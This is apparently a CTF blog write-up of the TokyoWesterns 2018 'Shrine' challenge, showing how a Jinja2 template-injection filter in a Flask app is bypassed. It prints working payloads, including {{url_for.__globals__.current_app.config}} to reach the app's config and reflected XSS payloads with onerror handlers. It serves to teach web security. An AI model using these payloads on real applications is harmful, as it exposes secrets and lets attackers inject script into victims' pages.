TokyoWesterns CTF 4th 2018 Writeup — Part 3

Abdelkader Belcaid
Sep 8, 2018 · 6 min read

06/09/2018 20:32 PM UTC+2

TokyoWesterns CTF 4th 2018 Writeup — Part 3

Obviously, in this blog i will talk about an important vulnerability; Server-Side Template Injection (SSTI) and i recommand you to read this one to understand it as well.

Shrine — 193pts

Shrine

Challenge: shrine

05/09/2018 07:06 AM UTC+2

When i’m reversing dec dec dec challenge, my teammate shared a python script of one challenge called Shrine telling us that he is working on this one. Seems this is app.py of web application created by using python in back-end.

Shrine challenge — app.py

I checked it faster and noticed that this application is based on Python Flask Framework, the first thing i thought about is Server-Side Template Injection (SSTI) Vulnerability.

As you see in app.py above; there is safe_jinja function with two filters. We have to bypass it to get in config or self as two blacklisted files. With two filtered symbols “(” and “)”.

So as summary of our mission is that we have to bypass in two steps: “()” and blacklisted config and self in order to get in config or self themselves finally.

Actually, I solved a set of challenges like this one and has same context, and i wrote one good and rich writeup about similar task but without filtered config or self, will find it in AngstromCTF 2018 WEB Writeups — Part 2.

Let’s follow The High Level Methodology to Capture an efficient Attack Process then apply it in this SSTI Attack!

The High Level Methodology to Capture an efficient Attack Process

1. Detect

As you see in app.py above; there is an interesting route:

@app.route('/shrine/<path:shrine>')

Let’s follow it:

Not Found

Let’s try to detect SSTI Vulnerability by injecting {{9*9}} in <path:shrine>:

SSTI has been detected

Yay … As you see i got 81 as result, so it’s executed by server and finally maked the error out!

Meanwhile, Server-Side Flask Template Injection (SSTI) Vulnerability has been detected.

2. Identify

As you see above in app.py; this template engine is Jinja2.

Meanwhile, Server-Side Flask Jinja2 Template Injection (SSTI) Vulnerability has been identified.

3. Exploit

I based my exploit on this one:

If you try getting into config or self directlly will not find anything interesting because these is blacklisted.

http://shrine.chal.ctf.westerns.tokyo/shrine/{{config}}
config is None (blacklisted)
http://shrine.chal.ctf.westerns.tokyo/shrine/{{self}}
self is None (blacklisted)

For more informations read it too:

SSTI: RCE for the modern webapp

So the idea is to get in config or self by using another method in order to bypass it as blacklisted functions. The first thing i thought about is to use subclasses and attributes until get in config, and to do that i have to list functions and attributes. After a while my friend found an interesting function:

http://shrine.chal.ctf.westerns.tokyo/shrine/{{request.environ}}
request.environ

But there is nothing interesting to help. I tried to find something new by searching about new subclasses then i discovered that’s using limited bytes to inject in this directory and that there is a possibility to inject html tags. Injected some html tags and XSSed it finally!

XSS

Exploited this XSS to show my picture but it was not the goal of this challenge, I did it just for fun.

Here is XSS payload which i injected to get XSS:

<html><img%20src=https://goo.gl/PCGz59%20width=100%%60hight=100%%20onerror=confirm></html>

XSS on Shrine challenge

I called my teammate @tnmch to enjoy this challenge by injecting this template above his picture with fun XD !!

say hello to @tnmch

Let’s enjoy injecting this template above my picture with fun ^^ !!

http://shrine.chal.ctf.westerns.tokyo/shrine/%7B%7B'hello%20tnmch'~'%20'~191*7%7D%7D%3Chtml%3E%3Cimg%20src=https://goo.gl/PCGz59%20width=100%%60highth=100%%20onerror=confirm(String.fromCharCode(88,83,83))%3E%3C/html%3E

Let’s back to our exploitation of this template injection. After long time of trying without any interesting result, I just tried to read about all Flask functions and objects, found an interesting one called url_for(). By the way In templates you have access to the config, request, session, and g objects, and the url_for() and get_flashed_messages() functions.

I tried them one by one till got all global variables of url_for() function by using __globals__ attribute.

http://shrine.chal.ctf.westerns.tokyo/shrine/{{url_for.__globals__}}
global variables of url_for() 1
global variables of url_for() 2

After (CTRL+F)ed “Flask” word i just found an interesting variable called: current_app.

current_app is found 1
current_app is found 2

Let’s try to get access into current_app:

http://shrine.chal.ctf.westerns.tokyo/shrine/{{url_for.__globals__.current_app}}
current_app 1
current_app 2

It means that we are in the application app.py again, so let’s try to get in config now!

http://shrine.chal.ctf.westerns.tokyo/shrine/{{url_for.__globals__.current_app.config}}
config (configuration dictionary) 1
config (configuration dictionary) 2

Yay … We just got access into config by using url_for() attributes instead to access into config directlly because it gaves None as result because it’s blacklisted and filtered in app.py and also without using “()” because it’s filtered too in app.py.

Our goal is to get access into config or self in order to find flag, as shown above the flag is really stored in config.

submitting Shrine’s flag
Shrine has been solved

FLAG is: TWCTF{pray_f0r_sacred_jinja2}

I would like to thank very much author of this challenge especially and TokyoWesterns Team generally. This task was very educational about one of strong vulnerabilities. I hope that my writeup will help everyone read it, here is the fourth part of this writeup if you are looking for read more …

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Abdelkader Belcaid

Written by

I'm Bug Bounty Hunter & CTF Player

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade